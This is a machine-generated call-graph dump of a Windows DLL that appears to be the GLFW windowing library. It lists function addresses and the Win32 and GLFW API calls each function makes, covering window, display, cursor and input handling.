64601b6a 6440->6441 6445 64601bab 6441->6445 6446 64601c11 sscanf 6441->6446 6447 64601bd6 strlen strncmp 6441->6447 6442 64602ef4 6 API calls 6443 64601d14 glfwMakeContextCurrent 6442->6443 6444 64601ec6 6443->6444 6444->6342 6444->6343 6445->6442 6449 64601c45 6446->6449 6450 64601c7c 6446->6450 6447->6441 6448 64601c04 6447->6448 6448->6446 6453 64602ef4 6 API calls 6449->6453 6451 64601c9c 6450->6451 6452 64601ce4 6450->6452 6454 64602ef4 6 API calls 6451->6454 6452->6445 6459 64601d23 6452->6459 6455 64601c6f glfwMakeContextCurrent 6453->6455 6456 64601ce2 6454->6456 6455->6444 6456->6443 6458 64601e4f glfwExtensionSupported 6460 64601e5f glfwMakeContextCurrent 6458->6460 6461 64601d73 glfwExtensionSupported 6459->6461 6462 64601d67 6459->6462 6463 64601dcd glfwExtensionSupported 6459->6463 6460->6444 6461->6462 6462->6463 6464 64601de9 glfwExtensionSupported 6462->6464 6463->6458 6465 64601e12 6463->6465 6464->6463 6465->6458 6711 6460c043 GetClientRect 6467->6711 6471 646037ea 6471->6336 6472->6351 6473->6336 6475 646083e1 calloc MultiByteToWideChar 6474->6475 6476 646083cb 6474->6476 6478 646083df 6475->6478 6479 64608424 6475->6479 6477 64608298 9 API calls 6476->6477 6477->6478 6478->6381 6478->6399 6480 64608298 9 API calls 6479->6480 6481 64608438 free 6480->6481 6481->6478 6482->6386 6483->6414 6485 6460a6fb 6484->6485 6486 6460a79f EnumDisplaySettingsW 6485->6486 6487 6460a816 6486->6487 6487->6377 6649 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6488->6649 6490 6460b205 6491 6460b231 AdjustWindowRectEx 6490->6491 6492 6460b20c AdjustWindowRectExForDpi 6490->6492 6493 6460b24d 6491->6493 6492->6493 6493->6377 6495 64602ef4 6 API calls 6494->6495 6496 6460837e 6495->6496 6496->6399 6650 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6498->6650 6500 6460ba22 6500->6392 6501 6460b8c5 6501->6500 6502 6460b9bc GetWindowLongW SetWindowLongW RedrawWindow 6501->6502 6503 6460b8ec CreateRectRgn 6501->6503 6502->6500 6504 6460b944 6503->6504 6505 6460b9b0 DeleteObject 6504->6505 6506 6460b94a GetWindowLongW SetWindowLongW SetLayeredWindowAttributes 6504->6506 6505->6500 6506->6505 6507->6406 6508->6415 6510 6460b135 6509->6510 6511 6460b0b9 SetThreadExecutionState 6509->6511 6652 6460a81d 6510->6652 6651 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6511->6651 6514 6460b0e3 6514->6510 6516 6460b0e7 SystemParametersInfoW SystemParametersInfoW 6514->6516 6515 6460b153 6515->6422 6516->6510 6517->6425 6519 64607397 LoadLibraryA 6518->6519 6529 646074dc 6518->6529 6520 646073bb 10 API calls 6519->6520 6521 646073ae 6519->6521 6522 646074e1 6520->6522 6523 646074c8 6520->6523 6524 64608298 9 API calls 6521->6524 6522->6521 6526 6460750c 6522->6526 6525 64608298 9 API calls 6523->6525 6524->6529 6525->6529 6527 64607533 6526->6527 6530 6460756b 6526->6530 6528 64608298 9 API calls 6527->6528 6528->6529 6529->6399 6554 646076e0 6529->6554 6679 64607101 6530->6679 6533 64607101 2 API calls 6534 646075ec 6533->6534 6535 64607101 2 API calls 6534->6535 6536 646075fd 6535->6536 6537 64607101 2 API calls 6536->6537 6538 6460760e 6537->6538 6539 64607101 2 API calls 6538->6539 6540 6460761f 6539->6540 6541 64607101 2 API calls 6540->6541 6542 64607630 6541->6542 6543 64607101 2 API calls 6542->6543 6544 64607641 6543->6544 6545 64607101 2 API calls 6544->6545 6546 64607652 6545->6546 6547 64607101 2 API calls 6546->6547 6548 64607663 6547->6548 6549 64607101 2 API calls 6548->6549 6550 64607674 6549->6550 6551 64607101 2 API calls 6550->6551 6552 64607685 6551->6552 6553 64607101 2 API calls 6552->6553 6553->6529 6555 64607708 GetDC 6554->6555 6556 646076fc 6554->6556 6557 6460773c 6555->6557 6585 64607728 6555->6585 6556->6555 6558 646078d4 DescribePixelFormat 6557->6558 6567 6460774a 6557->6567 6559 646078fe calloc 6558->6559 6587 6460792e 6559->6587 6560 64602ef4 6 API calls 6573 64607792 6560->6573 6561 64607d93 6564 64602ef4 6 API calls 6561->6564 6562 64607c6c DescribePixelFormat 6563 646079a5 6562->6563 6562->6587 6569 64608298 9 API calls 6563->6569 6568 64607da7 free 6564->6568 6565 64608298 9 API calls 6577 64607db5 6565->6577 6566 64607d8a 6566->6561 6570 64607df0 free 6566->6570 6567->6559 6567->6573 6568->6577 6571 64607cae free 6569->6571 6572 64607e09 DescribePixelFormat 6570->6572 6570->6577 6571->6577 6574 64607e51 SetPixelFormat 6572->6574 6575 64607e38 6572->6575 6573->6565 6573->6577 6574->6573 6579 64607e81 6574->6579 6576 64608298 9 API calls 6575->6576 6576->6577 6577->6398 6578 64607e9d 6581 64602ef4 6 API calls 6578->6581 6579->6578 6582 64607ed4 6579->6582 6580 64607305 9 API calls 6580->6587 6581->6577 6582->6573 6582->6577 6583 646080e8 GetLastError 6582->6583 6582->6585 6584 646080f5 6583->6584 6583->6585 6586 64602ef4 6 API calls 6584->6586 6585->6560 6586->6585 6587->6562 6587->6563 6587->6566 6587->6580 6589 64602229 6588->6589 6597 64602263 6588->6597 6590 64602245 6589->6590 6591 6460222f LoadLibraryA 6589->6591 6592 64602268 17 API calls 6590->6592 6593 6460224f 6590->6593 6591->6589 6591->6590 6595 6460242b 6592->6595 6596 646024ae 6592->6596 6594 64602ef4 6 API calls 6593->6594 6594->6597 6595->6596 6601 646024ce 6595->6601 6598 64602ef4 6 API calls 6596->6598 6597->6399 6614 646025a0 6597->6614 6599 646024c2 6598->6599 6688 646021b5 6599->6688 6602 6460253f 6601->6602 6603 646024e1 6601->6603 6692 64601fb6 6602->6692 6607 64602ef4 6 API calls 6603->6607 6606 64601fb6 2 API calls 6608 6460255c 6606->6608 6607->6599 6609 64601fb6 2 API calls 6608->6609 6610 6460256d 6609->6610 6611 64601fb6 2 API calls 6610->6611 6612 6460257e 6611->6612 6613 64601fb6 2 API calls 6612->6613 6613->6597 6615 646025c9 6614->6615 6621 646025b5 6614->6621 6618 64602622 calloc 6615->6618 6619 64602609 6615->6619 6616 64602ef4 6 API calls 6617 64602820 6616->6617 6617->6398 6622 64602652 calloc 6618->6622 6620 64602ef4 6 API calls 6619->6620 6620->6621 6621->6616 6626 64602685 6622->6626 6623 646027ec free free 6623->6621 6624 64602825 6623->6624 6627 64602843 6624->6627 6631 64602b5c 6624->6631 6625 64602ef4 6 API calls 6625->6617 6626->6623 6627->6625 6628 64602bcd strncmp 6630 64602c00 LoadLibraryA 6628->6630 6628->6631 6629 64602bfe 6629->6617 6632 64602ef4 6 API calls 6629->6632 6630->6617 6630->6631 6631->6617 6631->6628 6631->6629 6632->6617 6634 64606542 6633->6634 6641 64606522 6633->6641 6635 64606548 6634->6635 6636 6460652c LoadLibraryA 6634->6636 6637 64606551 6635->6637 6638 6460656a 7 API calls 6635->6638 6636->6634 6636->6635 6639 64602ef4 6 API calls 6637->6639 6644 64606623 6638->6644 6639->6641 6640 64602ef4 6 API calls 6642 64606663 6640->6642 6641->6399 6645 6460666f 6641->6645 6696 646064d4 6642->6696 6644->6640 6644->6641 6648 6460669e 6645->6648 6646 64602ef4 6 API calls 6647 64606847 6646->6647 6647->6395 6648->6646 6648->6647 6649->6490 6650->6501 6651->6514 6661 6460596b 6652->6661 6655 6460a79f EnumDisplaySettingsW 6657 6460a84f 6655->6657 6656 6460a8e2 6656->6515 6657->6656 6658 6460a8b3 ChangeDisplaySettingsExW 6657->6658 6658->6656 6659 6460a8ee 6658->6659 6660 64602ef4 6 API calls 6659->6660 6660->6656 6662 646059b2 6661->6662 6664 64605981 6661->6664 6665 64605633 6662->6665 6664->6655 6670 6460a958 6665->6670 6668 64605650 qsort free 6669 6460568c 6668->6669 6669->6664 6671 6460a98b EnumDisplaySettingsW 6670->6671 6672 6460aae4 6671->6672 6676 6460a9cd 6671->6676 6673 6460564c 6672->6673 6674 6460aae9 calloc 6672->6674 6673->6668 6673->6669 6675 6460a79f EnumDisplaySettingsW 6674->6675 6675->6673 6676->6671 6677 6460aa58 ChangeDisplaySettingsExW 6676->6677 6678 6460aa98 realloc 6676->6678 6677->6671 6677->6676 6678->6676 6681 64607112 6679->6681 6680 64607129 6680->6533 6681->6680 6683 646017ee 6681->6683 6684 646017fd strstr 6683->6684 6685 6460180f strlen 6684->6685 6687 6460182e 6684->6687 6686 6460181d 6685->6686 6686->6684 6686->6687 6687->6680 6689 646021c4 6688->6689 6690 646021e1 FreeLibrary 6689->6690 6691 646021f5 6689->6691 6690->6691 6691->6597 6693 64601fd2 6692->6693 6694 64601fe9 6693->6694 6695 646017ee 2 API calls 6693->6695 6694->6606 6695->6694 6697 646064f9 6696->6697 6698 646064dd FreeLibrary 6696->6698 6697->6641 6698->6641 6700 6460ada4 TlsGetValue 6699->6700 6701 6460ad87 6699->6701 6700->6431 6701->6700 6703 6460ade2 TlsSetValue 6702->6703 6704 6460adc5 6702->6704 6703->6434 6704->6703 6706 6460aea0 EnterCriticalSection 6705->6706 6707 6460ae83 6705->6707 6706->6436 6707->6706 6709 6460aec1 6708->6709 6710 6460aede LeaveCriticalSection 6708->6710 6709->6710 6710->6428 6712 646037cc 6711->6712 6713 6460d093 ClientToScreen SetCursorPos 6712->6713 6713->6471 7250 6460ce42 GetWindowLongW 7251 6460ce6b 7250->7251 7252 6460ce6f GetLayeredWindowAttributes 7250->7252 7252->7251 7271 6460d459 7272 6460d462 7271->7272 7274 6460d410 7272->7274 7275 6460b019 GetKeyState GetKeyState 7272->7275 7276 6460b047 7275->7276 7277 6460b04a GetKeyState 7275->7277 7276->7277 7278 6460b059 7277->7278 7279 6460b05c GetKeyState GetKeyState 7277->7279 7278->7279 7280 6460b077 7279->7280 7281 6460b07a GetKeyState 7279->7281 7280->7281 7282 6460b088 7281->7282 7283 6460b08b GetKeyState 7281->7283 7282->7283 7284 6460b099 7283->7284 7284->7274 7285 64610a5b 7290 6461099f 7285->7290 7286 646107e0 11 API calls 7286->7290 7287 64610a9d 7288 64610ad2 VirtualProtect 7287->7288 7291 64610935 7287->7291 7288->7287 7290->7286 7290->7287 7290->7291 7292 64610b30 7290->7292 7294 64610b82 7290->7294 7297 64610780 7290->7297 7292->7287 7292->7291 7323 646107e0 7292->7323 7295 64610780 11 API calls 7294->7295 7296 64610b92 7295->7296 7345 64611f20 7297->7345 7299 64610794 fwrite 7346 64611f20 7299->7346 7301 646107c0 vfprintf abort 7306 646107e0 7301->7306 7302 64610888 7302->7290 7303 64610907 7304 64610780 4 API calls 7303->7304 7312 64610917 7304->7312 7305 64610847 VirtualQuery 7305->7306 7307 646108e7 7305->7307 7306->7302 7306->7303 7306->7305 7309 64610896 VirtualProtect 7306->7309 7307->7303 7308 64610780 4 API calls 7307->7308 7308->7303 7309->7302 7310 646108ca GetLastError 7309->7310 7310->7306 7311 64610780 4 API calls 7310->7311 7311->7306 7313 64610b30 7312->7313 7314 64610b82 7312->7314 7316 64610935 7312->7316 7319 646107e0 VirtualQuery VirtualProtect GetLastError VirtualProtect 7312->7319 7320 64610780 4 API calls 7312->7320 7322 64610a9d 7312->7322 7315 646107e0 4 API calls 7313->7315 7313->7316 7313->7322 7317 64610780 4 API calls 7314->7317 7315->7313 7316->7290 7318 64610b92 7317->7318 7319->7312 7320->7312 7321 64610ad2 VirtualProtect 7321->7322 7322->7316 7322->7321 7328 646107f6 7323->7328 7324 64610888 7324->7292 7325 64610907 7326 64610780 7 API calls 7325->7326 7340 64610917 7326->7340 7327 64610847 VirtualQuery 7327->7328 7329 646108e7 7327->7329 7328->7324 7328->7325 7328->7327 7331 64610896 VirtualProtect 7328->7331 7329->7325 7330 64610780 7 API calls 7329->7330 7330->7325 7331->7324 7332 646108ca GetLastError 7331->7332 7332->7328 7333 64610780 7 API calls 7332->7333 7333->7328 7334 64610b30 7336 646107e0 7 API calls 7334->7336 7342 64610a9d 7334->7342 7344 64610935 7334->7344 7335 64610b82 7337 64610780 7 API calls 7335->7337 7336->7334 7338 64610b92 7337->7338 7339 646107e0 7 API calls 7339->7340 7340->7334 7340->7335 7340->7339 7341 64610780 7 API calls 7340->7341 7340->7342 7340->7344 7341->7340 7343 64610ad2 VirtualProtect 7342->7343 7342->7344 7343->7342 7344->7292 7345->7299 7346->7301 7347 6460e05c WaitMessage 7353 6460d621 7355 6460d62f 7353->7355 7354 6460d6a3 7357 6460b019 7 API calls 7354->7357 7355->7354 7356 6460d690 SetCapture 7355->7356 7356->7354 7358 6460d6ab 7357->7358 7359 6460d6d7 7358->7359 7360 6460d6d1 ReleaseCapture 7358->7360 7360->7359 7361 6460c222 7362 6460c232 7361->7362 7363 6460c299 7361->7363 7362->7363 7364 6460c238 GetWindowRect 7362->7364 7367 6460b56d 7364->7367 7374 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7367->7374 7369 6460b591 7370 6460b59a GetDpiForWindow 7369->7370 7371 6460b5ac 7369->7371 7370->7371 7372 6460b1d6 6 API calls 7371->7372 7373 6460b5e0 MoveWindow 7372->7373 7373->7363 7374->7369 7375 6460c426 ShowWindow 7390 6460183f 7391 6460ad78 TlsGetValue 7390->7391 7392 64601855 7391->7392 7393 64601890 7392->7393 7394 64602ef4 6 API calls 7392->7394 7394->7393 7403 64612000 GetModuleHandleW GetProcAddress 7412 64605c0b 7413 64605c27 GetMonitorInfoW 7412->7413 7415 6460a767 7413->7415 7416 64601410 7419 646013f0 7416->7419 7422 64611df0 7419->7422 7423 64611e02 _lock 7422->7423 7424 64601407 7422->7424 7425 64611e70 calloc 7423->7425 7426 64611e14 7423->7426 7425->7426 7427 64611e9f _unlock 7425->7427 7428 64611e40 realloc 7426->7428 7429 64611e1e _unlock 7426->7429 7427->7424 7428->7427 7430 64611e64 7428->7430 7429->7424 7430->7429 7431 64610c10 7432 64610c20 calloc 7431->7432 7433 64610c19 7431->7433 7434 64610c7b 7432->7434 7435 64610c3e EnterCriticalSection LeaveCriticalSection 7432->7435 7435->7434 7436 64603211 7437 6460321f 7436->7437 7438 6460323f 7437->7438 7439 6460ad78 TlsGetValue 7437->7439 7439->7438 7440 64605419 7441 64605440 7440->7441 7442 64605428 7440->7442 7443 6460af44 2 API calls 7441->7443 7444 64602ef4 6 API calls 7442->7444 7445 6460543c 7443->7445 7444->7445 7446 6460401e 7447 6460402c 7446->7447 7448 64604066 7447->7448 7449 64602ef4 6 API calls 7447->7449 7449->7448 7454 64603eea 7455 64603ef9 7454->7455 7456 64603f35 calloc 7455->7456 7457 64603f1f 7455->7457 7463 6460e173 7456->7463 7458 64602ef4 6 API calls 7457->7458 7460 64603f33 7458->7460 7462 64603f76 glfwDestroyCursor 7462->7460 7466 6460b26a GetDC CreateDIBSection ReleaseDC 7463->7466 7467 6460b359 7466->7467 7468 6460b36f CreateBitmap 7466->7468 7469 64608298 9 API calls 7467->7469 7470 6460b3d2 CreateIconIndirect DeleteObject DeleteObject 7468->7470 7471 6460b3ad 7468->7471 7474 64603f72 7469->7474 7470->7474 7476 6460b479 7470->7476 7473 64608298 9 API calls 7471->7473 7475 6460b3c1 DeleteObject 7473->7475 7474->7460 7474->7462 7475->7474 7477 64608298 9 API calls 7476->7477 7477->7474 7478 64603ceb 7482 64603cff 7478->7482 7479 64603d7b 7480 64602ef4 6 API calls 7479->7480 7481 64603db3 7480->7481 7482->7479 7483 64603db5 7482->7483 7487 6460cd0b GetActiveWindow 7483->7487 7485 64603dc3 7485->7481 7486 6460d093 ClientToScreen SetCursorPos 7485->7486 7487->7485 7488 6460deec 7489 6460def5 PeekMessageW 7488->7489 7490 6460df5a GetActiveWindow 7489->7490 7498 6460df28 7489->7498 7491 6460df68 GetPropW 7490->7491 7492 6460dfe9 7490->7492 7491->7492 7499 6460df81 7491->7499 7494 6460e054 7492->7494 7495 6460c043 GetClientRect 7492->7495 7493 6460df44 TranslateMessage DispatchMessageW 7493->7489 7497 6460e00e 7495->7497 7496 6460df93 GetKeyState 7496->7499 7497->7494 7502 6460d093 ClientToScreen SetCursorPos 7497->7502 7498->7489 7498->7493 7499->7492 7499->7496 7501 6460b019 7 API calls 7499->7501 7501->7499 7502->7494 7507 64606eef 7508 64606f05 7507->7508 7509 64606f4c 7508->7509 7510 64606bcb 14 API calls 7508->7510 7512 64602ef4 6 API calls 7509->7512 7511 64606f69 7510->7511 7511->7509 7513 64606f8a 7511->7513 7514 64606f8c 7511->7514 7512->7513 7515 64602ef4 6 API calls 7514->7515 7516 6460e4e8 7514->7516 7515->7516 7517 6460d6ef 7518 6460d70b TrackMouseEvent 7517->7518 7520 6460d750 7517->7520 7518->7520 7519 6460deb9 DefWindowProcW 7520->7519 7525 646020f2 7526 646020fe 7525->7526 7527 64602ef4 6 API calls 7526->7527 7528 64602153 7527->7528 7529 64605ef4 7530 64605f07 7529->7530 7531 64605f54 7530->7531 7532 64605f6c 7530->7532 7534 64602ef4 6 API calls 7531->7534 7533 64605f6a 7532->7533 7535 64605633 7 API calls 7532->7535 7534->7533 7535->7533 7546 6460f6fd 7547 6460f70e 7546->7547 7548 6460f811 7547->7548 7549 64602ef4 6 API calls 7547->7549 7550 6460f80b 7549->7550 7551 646106c3 7552 646106e2 7551->7552 7553 646106f6 7552->7553 7556 64610d20 7552->7556 7555 6461075c 7557 64610d31 7556->7557 7558 64610df0 7556->7558 7559 64610d33 7557->7559 7560 64610d58 7557->7560 7558->7555 7561 64610d37 7559->7561 7562 64610d88 7559->7562 7568 64610d40 7560->7568 7570 64610ba0 EnterCriticalSection 7560->7570 7563 64610d70 InitializeCriticalSection 7561->7563 7561->7568 7565 64610ba0 4 API calls 7562->7565 7567 64610d96 7562->7567 7563->7568 7565->7567 7566 64610dc1 DeleteCriticalSection 7566->7568 7567->7566 7567->7568 7569 64610db0 free 7567->7569 7568->7555 7569->7566 7569->7569 7571 64610bc1 7570->7571 7572 64610bf5 LeaveCriticalSection 7570->7572 7571->7572 7573 64610bd0 TlsGetValue GetLastError 7571->7573 7572->7568 7573->7571 7595 6460a2c9 GetMonitorInfoW 7596 6460a31c 7595->7596 7597 6460a303 wcscmp 7595->7597 7597->7596 7608 646094cb 7609 64609506 7608->7609 7610 64609526 7609->7610 7611 6460950d 7609->7611 7614 64609542 7610->7614 7615 64609606 calloc 7610->7615 7612 64602ef4 6 API calls 7611->7612 7632 64609521 7612->7632 7613 64602ef4 6 API calls 7613->7632 7614->7613 7616 6460966d 7615->7616 7617 64609674 7616->7617 7618 646096aa qsort WideCharToMultiByte 7616->7618 7619 64602ef4 6 API calls 7617->7619 7620 64609721 7618->7620 7621 64609757 memcmp 7618->7621 7624 64609688 free 7619->7624 7625 64602ef4 6 API calls 7620->7625 7622 646097b7 sprintf 7621->7622 7623 6460977c sprintf 7621->7623 7626 64609840 7622->7626 7623->7626 7624->7632 7627 64609735 free 7625->7627 7628 646036a2 14 API calls 7626->7628 7627->7632 7631 64609870 7628->7631 7631->7632 7633 64609884 free 7631->7633 7633->7632 7634 6460bacb RegisterRawInputDevices 7635 6460bb05 7634->7635 7636 6460bb19 7634->7636 7637 64608298 9 API calls 7635->7637 7637->7636 7638 646116cc 7639 646116d0 7638->7639 7640 64611c20 _errno 7639->7640 7641 646116fa 7640->7641 7642 64611930 7641->7642 7644 64611322 7641->7644 7643 64611950 _errno 7642->7643 7646 6461137a 7642->7646 7643->7646 7645 64611c20 _errno 7644->7645 7644->7646 7645->7646 7647 64601ed0 7648 64601ede 7647->7648 7649 64601f04 7648->7649 7650 6460ad78 TlsGetValue 7648->7650 7651 64602ef4 6 API calls 7649->7651 7653 64601f41 7649->7653 7650->7649 7652 64601f39 7651->7652 7654 646018d1 7655 646018e0 7654->7655 7656 646018f8 7654->7656 7657 64602ef4 6 API calls 7655->7657 7658 6460ad78 TlsGetValue 7656->7658 7659 646018f4 7657->7659 7658->7659 7660 646120d2 7661 646120f0 __setusermatherr 7660->7661 7675 646098db 7677 646098f2 7675->7677 7676 646098fb memcmp 7676->7677 7678 64609932 7676->7678 7677->7676 7679 6460992a 7677->7679 7681 64609317 7679->7681 7682 64609359 7681->7682 7683 646094c1 7682->7683 7684 64609364 calloc 7682->7684 7683->7678 7685 64609395 7684->7685 7686 6460939b free 7685->7686 7688 646093a8 7685->7688 7686->7683 7689 64609480 strstr 7688->7689 7690 646093b8 free 7688->7690 7689->7688 7689->7690 7690->7683 7691 646104a1 7692 646104b0 7691->7692 7693 646013f0 5 API calls 7692->7693 7694 646104e0 7693->7694 7699 6460d4a1 7700 6460b019 7 API calls 7699->7700 7701 6460d4bb 7700->7701 7702 6460d4e0 7701->7702 7703 6460d4c8 MapVirtualKeyW 7701->7703 7704 6460d4f6 GetMessageTime PeekMessageW 7702->7704 7706 6460d538 7702->7706 7703->7702 7704->7706 7705 6460deb9 DefWindowProcW 7706->7705 7711 64610ca8 7712 64610cb0 EnterCriticalSection 7711->7712 7713 64610cf0 LeaveCriticalSection 7712->7713 7714 64610cc9 7712->7714 7714->7713 7715 64610ce8 free 7714->7715 7715->7713 7734 6460c4b6 FlashWindow 7735 64602cb6 7736 64602cc8 7735->7736 7737 64602cf6 7736->7737 7738 64602ef4 6 API calls 7736->7738 7738->7737 7739 6460ceb6 7740 6460ceea SetWindowLongW SetLayeredWindowAttributes 7739->7740 7741 6460cf5c SetWindowLongW 7739->7741 7744 6460cf7f 7740->7744 7741->7744 7749 6460b6b7 GetWindowLongW 7750 6460b543 7749->7750 7751 6460b6ec GetClientRect 7750->7751 7759 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7751->7759 7753 6460b70f 7754 6460b713 GetDpiForWindow 7753->7754 7755 6460b756 7753->7755 7758 6460b735 7754->7758 7756 6460b75d AdjustWindowRectEx 7755->7756 7757 6460b779 ClientToScreen ClientToScreen SetWindowLongW SetWindowPos 7756->7757 7758->7757 7759->7753 7760 6460dab7 7761 6460b56d 7 API calls 7760->7761 7762 6460dad5 7761->7762 7763 646010bc 7764 646010c0 7763->7764 7765 646010e2 7764->7765 7766 646010c8 Sleep 7764->7766 7767 64601200 _amsg_exit 7765->7767 7768 646010f2 7765->7768 7766->7764 7769 646011b0 _initterm 7768->7769 7770 646010ff 7768->7770 7769->7770 7771 646011d8 _initterm 7770->7771 7772 6460110d 7770->7772 7771->7772 7777 64607283 7778 64607296 7777->7778 7779 646072b1 7778->7779 7781 64608298 9 API calls 7778->7781 7780 6460adb6 TlsSetValue 7779->7780 7782 64607300 7780->7782 7781->7779 7783 64610c85 7784 64610ca1 7783->7784 7785 64610cb0 EnterCriticalSection 7783->7785 7784->7785 7786 64610cf0 LeaveCriticalSection 7785->7786 7787 64610cc9 7785->7787 7787->7786 7788 64610ce8 free 7787->7788 7788->7786 7789 6460c085 7790 6460c0ae 7789->7790 7791 6460c09e 7789->7791 7801 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7790->7801 7793 6460c1a1 7791->7793 7795 6460b0a6 21 API calls 7791->7795 7794 6460c0df 7796 6460c0e3 GetDpiForWindow 7794->7796 7797 6460c12f 7794->7797 7795->7790 7798 6460c105 7796->7798 7799 6460c13f AdjustWindowRectEx 7797->7799 7800 6460c15b SetWindowPos 7798->7800 7799->7800 7800->7793 7801->7794 7806 64611a89 7807 64611a90 7806->7807 7808 64611bc0 7807->7808 7809 64611aa0 _errno 7807->7809 7810 64611aef 7809->7810 7811 64602c89 7812 64602cb5 7811->7812 7813 64602c97 7811->7813 7814 64602ef4 6 API calls 7813->7814 7815 64602cb1 7814->7815 7816 6461148b 7817 64611490 7816->7817 7818 64611c20 _errno 7817->7818 7819 6461153a 7817->7819 7821 64611428 7817->7821 7818->7819 7820 64611950 _errno 7819->7820 7819->7821 7820->7821 7822 6460548a 7823 6460549e 7822->7823 7824 646054d1 7823->7824 7826 646054ee 7823->7826 7825 64602ef4 6 API calls 7824->7825 7827 646054e9 7825->7827 7828 6460af44 2 API calls 7826->7828 7828->7827 7829 6460da8a 7830 6460da91 7829->7830 7831 6460da98 7829->7831 7833 6460b169 7830->7833 7834 6460b1c0 7833->7834 7835 6460b176 GetClientRect ClientToScreen ClientToScreen 7833->7835 7836 6460b1c7 ClipCursor 7834->7836 7835->7836 7836->7831 7837 64610e90 strlen 7838 64610eaa 7837->7838 7839 64610f0a 7837->7839 7838->7839 7840 64610ef2 strncmp 7838->7840 7840->7838 7840->7839 7842 64603893 7843 646038a9 7842->7843 7846 646038cf 7843->7846 7851 6460cfe6 GetCursorPos 7843->7851 7847 6460e0e4 7850 6460e10d 7847->7850 7855 6460b4a7 GetCursorPos 7847->7855 7852 6460392c 7851->7852 7853 6460d006 ScreenToClient 7851->7853 7852->7847 7854 6460cd0b GetActiveWindow 7852->7854 7853->7852 7854->7847 7856 6460b4c3 7855->7856 7857 6460b4c7 WindowFromPoint 7855->7857 7856->7850 7857->7856 7858 6460b4e4 GetClientRect ClientToScreen ClientToScreen PtInRect 7857->7858 7858->7856 7859 64606894 7860 646068aa _assert 7859->7860 7862 646068c7 7859->7862 7860->7862 7861 64602ef4 6 API calls 7863 6460692d 7861->7863 7862->7861 7862->7863 7864 64601098 7866 646010a0 7864->7866 7865 64601150 7866->7865 7867 646010e2 7866->7867 7868 646010c8 Sleep 7866->7868 7869 64601200 _amsg_exit 7867->7869 7870 646010f2 7867->7870 7868->7866 7871 646011b0 _initterm 7870->7871 7872 646010ff 7870->7872 7871->7872 7873 646011d8 _initterm 7872->7873 7874 6460110d 7872->7874 7873->7874 7875 6461069b 7876 646106a0 7875->7876 7877 64610d20 7 API calls 7876->7877 7878 646106b8 7877->7878 6748 6460309b 6749 646030b8 6748->6749 6750 646030ae 6748->6750 6767 64608848 KiUserCallbackDispatcher SystemParametersInfoW 6749->6767 6755 646030fa 6766 646030e4 6755->6766 6814 6460ace8 6755->6814 6758 6460ace8 10 API calls 6759 6460311a 6758->6759 6760 6460adb6 TlsSetValue 6759->6760 6759->6766 6761 64603137 6760->6761 6820 6460af44 6761->6820 6764 64603156 6764->6750 6765 64603160 glfwUpdateGamepadMappings 6764->6765 6765->6764 6765->6766 6824 64602d50 6766->6824 6768 646088b0 6767->6768 6769 646088c7 GetProcAddress 6768->6769 6799 646088ba 6768->6799 6771 646088ed 6769->6771 6770 64608298 9 API calls 6772 646030e0 6770->6772 6773 64608904 7 API calls 6771->6773 6771->6799 6772->6766 6811 6460adfc 6772->6811 6774 646089ab GetProcAddress 6773->6774 6775 646089bf 6773->6775 6774->6775 6776 646089d7 LoadLibraryA 6775->6776 6777 64608a19 LoadLibraryA 6775->6777 6776->6775 6778 646089ec GetProcAddress GetProcAddress 6776->6778 6779 64608a75 6777->6779 6780 64608a2f GetProcAddress GetProcAddress GetProcAddress 6777->6780 6778->6777 6781 64608ab8 6779->6781 6782 64608a8b GetProcAddress GetProcAddress 6779->6782 6780->6779 6783 64608ace GetProcAddress 6781->6783 6784 64608ae2 6781->6784 6782->6781 6783->6784 6845 64608533 6784->6845 6788 64608dc0 6789 64608dd3 6788->6789 6790 64608dc4 SetProcessDpiAwarenessContext 6788->6790 6851 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6789->6851 6791 64608df3 6790->6791 6853 6460bb1b GetModuleHandleW LoadCursorW GetModuleHandleW LoadImageW 6791->6853 6793 64608def 6793->6791 6852 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6793->6852 6797 64608e36 GetModuleHandleW CreateWindowExW 6797->6799 6800 64608ecc ShowWindow RegisterDeviceNotificationW 6797->6800 6798 64608e1f 6798->6791 6801 64608e23 SetProcessDPIAware 6798->6801 6799->6770 6802 64608f2f PeekMessageW 6800->6802 6801->6791 6803 64608f63 TranslateMessage DispatchMessageW 6802->6803 6804 64608f7f 6802->6804 6803->6802 6859 6460aef0 QueryPerformanceFrequency 6804->6859 6812 6460ae28 InitializeCriticalSection 6811->6812 6813 6460ae0b 6811->6813 6812->6755 6813->6812 6815 6460ad14 TlsAlloc 6814->6815 6816 6460acf7 6814->6816 6817 6460ad20 6815->6817 6818 6460310a 6815->6818 6816->6815 6819 64608298 9 API calls 6817->6819 6818->6758 6818->6766 6819->6818 6821 6460af53 QueryPerformanceCounter 6820->6821 6822 6460af68 timeGetTime 6820->6822 6823 64603146 glfwDefaultWindowHints 6821->6823 6822->6823 6823->6764 6825 64602d69 6824->6825 6826 64602d72 glfwDestroyWindow 6825->6826 6827 64602d7c 6825->6827 6826->6825 6828 64602d85 glfwDestroyCursor 6827->6828 6831 64602d8f 6827->6831 6828->6827 6829 64602dc1 free free 6877 64606a9c 6829->6877 6831->6829 6867 6460abc8 6831->6867 6870 64605774 6831->6870 6834 64602e03 6880 64608f9b 6834->6880 6836 64602e08 6837 64602e21 free 6836->6837 6838 64602e32 6836->6838 6837->6836 6907 6460ad49 6838->6907 6841 6460ad49 TlsFree 6842 64602e4c 6841->6842 6910 6460ae45 6842->6910 6848 64608575 6845->6848 6846 646086a3 6850 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6846->6850 6847 646085b0 MapVirtualKeyW 6847->6848 6848->6846 6848->6847 6849 6460864c WideCharToMultiByte 6848->6849 6849->6848 6850->6788 6851->6793 6852->6798 6854 6460bbc1 LoadImageW 6853->6854 6855 6460bbf8 RegisterClassExW 6853->6855 6854->6855 6856 6460bc11 6855->6856 6857 64608e2e 6855->6857 6858 64608298 9 API calls 6856->6858 